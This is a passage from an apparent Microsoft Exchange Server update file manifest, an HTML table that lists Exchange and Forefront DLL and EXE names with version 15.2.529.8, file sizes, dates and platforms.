osoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>15.2.529.8</td><td>21,064</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>15.2.529.8</td><td>35,408</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpchttpmodules.dll</td><td>15.2.529.8</td><td>42,568</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>15.2.529.8</td><td>56,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>15.2.529.8</td><td>27,512</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.rules.common.dll</td><td>15.2.529.8</td><td>130,432</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>15.2.529.8</td><td>20,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.safehtml.dll</td><td>15.2.529.8</td><td>21,368</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.activities.dll</td><td>15.2.529.8</td><td>267,648</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.contacts.dll</td><td>15.2.529.8</td><td>110,968</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.core.dll</td><td>15.2.529.8</td><td>112,720</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.services.dll</td><td>15.2.529.8</td><td>622,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.dll</td><td>15.2.529.8</td><td>185,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.eventlog.dll</td><td>15.2.529.8</td><td>12,152</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.blingwrapper.dll</td><td>15.2.529.8</td><td>19,536</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.core.dll</td><td>15.2.529.8</td><td>212,040</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.ediscoveryquery.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.engine.dll</td><td>15.2.529.8</td><td>97,872</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.configuration.dll</td><td>15.2.529.8</td><td>16,976</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.dll</td><td>15.2.529.8</td><td>436,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.files.dll</td><td>15.2.529.8</td><td>274,304</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.flighting.dll</td><td>15.2.529.8</td><td>24,952</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.mdb.dll</td><td>15.2.529.8</td><td>217,976</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.service.exe</td><td>15.2.529.8</td><td>26,496</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.applicationencryption.dll</td><td>15.2.529.8</td><td>221,056</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>15.2.529.8</td><td>1,558,632</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.msarpsservice.exe</td><td>15.2.529.8</td><td>19,832</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.securitymsg.dll</td><td>15.2.529.8</td><td>28,544</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.admininterface.dll</td><td>15.2.529.8</td><td>225,376</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.common.dll</td><td>15.2.529.8</td><td>5,150,288</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.diagnostics.dll</td><td>15.2.529.8</td><td>214,912</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.directoryservices.dll</td><td>15.2.529.8</td><td>115,576</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.esebackinterop.dll</td><td>15.2.529.8</td><td>83,024</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.eventlog.dll</td><td>15.2.529.8</td><td>80,760</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.fulltextindex.dll</td><td>15.2.529.8</td><td>66,432</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.ha.dll</td><td>15.2.529.8</td><td>81,488</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.lazyindexing.dll</td><td>15.2.529.8</td><td>212,040</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.logicaldatamodel.dll</td><td>15.2.529.8</td><td>1,340,800</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.mapidisp.dll</td><td>15.2.529.8</td><td>511,872</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.multimailboxsearch.dll</td><td>15.2.529.8</td><td>47,688</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.physicalaccess.dll</td><td>15.2.529.8</td><td>873,544</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertydefinitions.dll</td><td>15.2.529.8</td><td>1,352,056</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertytag.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.rpcproxy.dll</td><td>15.2.529.8</td><td>130,424</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storecommonservices.dll</td><td>15.2.529.8</td><td>1,018,752</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storeintegritycheck.dll</td><td>15.2.529.8</td><td>111,480</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.workermanager.dll</td><td>15.2.529.8</td><td>34,680</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.xpress.dll</td><td>15.2.529.8</td><td>19,320</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>15.2.529.8</td><td>14,944</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>15.2.529.8</td><td>60,792</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.dll</td><td>15.2.529.8</td><td>50,768</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.common.dll</td><td>15.2.529.8</td><td>74,104</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>15.2.529.8</td><td>8,494,152</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.ewshandler.dll</td><td>15.2.529.8</td><td>633,728</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.ewsserialization.dll</td><td>15.2.529.8</td><td>1,651,280</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.json.dll</td><td>15.2.529.8</td><td>296,520</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.messaging.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.onlinemeetings.dll</td><td>15.2.529.8</td><td>233,336</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.surface.dll</td><td>15.2.529.8</td><td>178,552</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.wcf.dll</td><td>15.2.529.8</td><td>348,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>15.2.529.8</td><td>56,696</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.bootstrapper.common.dll</td><td>15.2.529.8</td><td>93,056</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common.dll</td><td>15.2.529.8</td><td>296,312</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.commonbase.dll</td><td>15.2.529.8</td><td>35,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.console.dll</td><td>15.2.529.8</td><td>27,216</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.gui.dll</td><td>15.2.529.8</td><td>114,784</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.parser.dll</td><td>15.2.529.8</td><td>53,624</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>15.2.529.8</td><td>75,128</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.caches.dll</td><td>15.2.529.8</td><td>142,720</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.client.dll</td><td>15.2.529.8</td><td>24,960</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.eventlog.dll</td><td>15.2.529.8</td><td>15,232</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.exe</td><td>15.2.529.8</td><td>58,744</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharepointsignalstore.dll</td><td>15.2.529.8</td><td>27,000</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.slabmanifest.dll</td><td>15.2.529.8</td><td>47,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>15.2.529.8</td><td>46,968</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.service.exe</td><td>15.2.529.8</td><td>28,232</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.worker.exe</td><td>15.2.529.8</td><td>26,488</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.eventlog.dll</td><td>15.2.529.8</td><td>13,904</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.exe</td><td>15.2.529.8</td><td>31,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>15.2.529.8</td><td>1,205,112</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>15.2.529.8</td><td>158,800</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.symphonyhandler.dll</td><td>15.2.529.8</td><td>628,096</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.syncmigration.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.syncmigrationservicelet.dll</td><td>15.2.529.8</td><td>16,248</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.systemprobemsg.dll</td><td>15.2.529.8</td><td>13,392</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.textprocessing.dll</td><td>15.2.529.8</td><td>221,776</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.textprocessing.eventlog.dll</td><td>15.2.529.8</td><td>13,696</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.addressbookpolicyroutingagent.dll</td><td>15.2.529.8</td><td>29,256</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>15.2.529.8</td><td>138,624</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>15.2.529.8</td><td>21,888</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.controlflow.dll</td><td>15.2.529.8</td><td>40,320</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.faultinjectionagent.dll</td><td>15.2.529.8</td><td>22,904</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.frontendproxyagent.dll</td><td>15.2.529.8</td><td>21,376</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>15.2.529.8</td><td>212,344</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.interceptoragent.dll</td><td>15.2.529.8</td><td>98,680</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>15.2.529.8</td><td>22,912</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.dll</td><td>15.2.529.8</td><td>169,344</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.eventlog.dll</td><td>15.2.529.8</td><td>18,304</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.phishingdetection.dll</td><td>15.2.529.8</td><td>21,064</td><td>01-Jan-2020</td><td>11:24</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>15.2.529.8</td><td>31,824</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>15.2.529.8</td><td>47,176</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.search.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>15.2.529.8</td><td>53,120</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll</td><td>15.2.529.8</td><td>44,928</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.systemprobedrop.dll</td><td>15.2.529.8</td><td>18,504</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.transportfeatureoverrideagent.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>15.2.529.8</td><td>46,664</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.cloudmonitor.common.dll</td><td>15.2.529.8</td><td>28,024</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.common.dll</td><td>15.2.529.8</td><td>457,088</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.contracts.dll</td><td>15.2.529.8</td><td>18,504</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.decisionengine.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>15.2.529.8</td><td>4,183,928</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dsapiclient.dll</td><td>15.2.529.8</td><td>182,144</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>15.2.529.8</td><td>121,728</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.extensibility.dll</td><td>15.2.529.8</td><td>404,040</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.extensibilityeventlog.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.flighting.dll</td><td>15.2.529.8</td><td>90,192</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.dll</td><td>15.2.529.8</td><td>89,160</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>15.2.529.8</td><td>68,472</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.loggingcommon.dll</td><td>15.2.529.8</td><td>63,360</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.monitoring.dll</td><td>15.2.529.8</td><td>430,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.net.dll</td><td>15.2.529.8</td><td>122,232</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.contracts.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.dll</td><td>15.2.529.8</td><td>29,056</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.httpsubmission.dll</td><td>15.2.529.8</td><td>60,792</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.requestbroker.dll</td><td>15.2.529.8</td><td>50,256</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.contracts.dll</td><td>15.2.529.8</td><td>33,144</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.dll</td><td>15.2.529.8</td><td>113,016</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.smtpshared.dll</td><td>15.2.529.8</td><td>18,304</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.contracts.dll</td><td>15.2.529.8</td><td>52,088</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.dll</td><td>15.2.529.8</td><td>675,400</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.management.dll</td><td>15.2.529.8</td><td>23,936</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.agents.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>15.2.529.8</td><td>487,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.dll</td><td>15.2.529.8</td><td>306,256</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.eventlog.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.migrationrpc.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>15.2.529.8</td><td>1,044,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>15.2.529.8</td><td>15,432</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>15.2.529.8</td><td>18,808</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportsyncmanagersvc.exe</td><td>15.2.529.8</td><td>19,024</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>15.2.529.8</td><td>118,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>15.2.529.8</td><td>924,536</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>15.2.529.8</td><td>1,466,744</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umvariantconfiguration.dll</td><td>15.2.529.8</td><td>32,640</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.dll</td><td>15.2.529.8</td><td>41,848</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.exchange.dll</td><td>15.2.529.8</td><td>25,168</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesync.eventlog.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesyncservicelet.dll</td><td>15.2.529.8</td><td>83,320</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicysyncservicelet.dll</td><td>15.2.529.8</td><td>50,040</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.antispam.dll</td><td>15.2.529.8</td><td>642,432</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.core.dll</td><td>15.2.529.8</td><td>186,232</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.dll</td><td>15.2.529.8</td><td>67,456</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.eventlog.dll</td><td>15.2.529.8</td><td>12,872</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.variantconfiguration.excore.dll</td><td>15.2.529.8</td><td>56,696</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.globalsettings.dll</td><td>15.2.529.8</td><td>27,512</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.hygiene.dll</td><td>15.2.529.8</td><td>120,912</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.protectionservice.dll</td><td>15.2.529.8</td><td>31,608</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.threatintel.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.auth.dll</td><td>15.2.529.8</td><td>35,920</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.dll</td><td>15.2.529.8</td><td>1,054,288</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.xrm.dll</td><td>15.2.529.8</td><td>68,176</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.wlmservicelet.dll</td><td>15.2.529.8</td><td>23,632</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.wopiclient.dll</td><td>15.2.529.8</td><td>77,392</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingset.signalapi.dll</td><td>15.2.529.8</td><td>17,272</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingsetabstraction.signalapiabstraction.dll</td><td>15.2.529.8</td><td>29,048</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.dll</td><td>15.2.529.8</td><td>505,424</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.eventlogs.dll</td><td>15.2.529.8</td><td>14,928</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.configuration.dll</td><td>15.2.529.8</td><td>36,736</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.dll</td><td>15.2.529.8</td><td>66,432</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.fast.contextlogger.json.dll</td><td>15.2.529.8</td><td>19,536</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.filtering.dll</td><td>15.2.529.8</td><td>113,224</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.filtering.exchange.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.filtering.interop.dll</td><td>15.2.529.8</td><td>15,432</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.dll</td><td>15.2.529.8</td><td>47,176</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.eventlog.dll</td><td>15.2.529.8</td><td>15,952</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.forefront.filtering.common.dll</td><td>15.2.529.8</td><td>23,936</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.diagnostics.dll</td><td>15.2.529.8</td><td>22,608</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.eventpublisher.dll</td><td>15.2.529.8</td><td>34,680</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.management.powershell.format.ps1xml</td><td>Not applicable</td><td>48,898</td><td>01-Jan-2020</td><td>11:21</td><td>Not 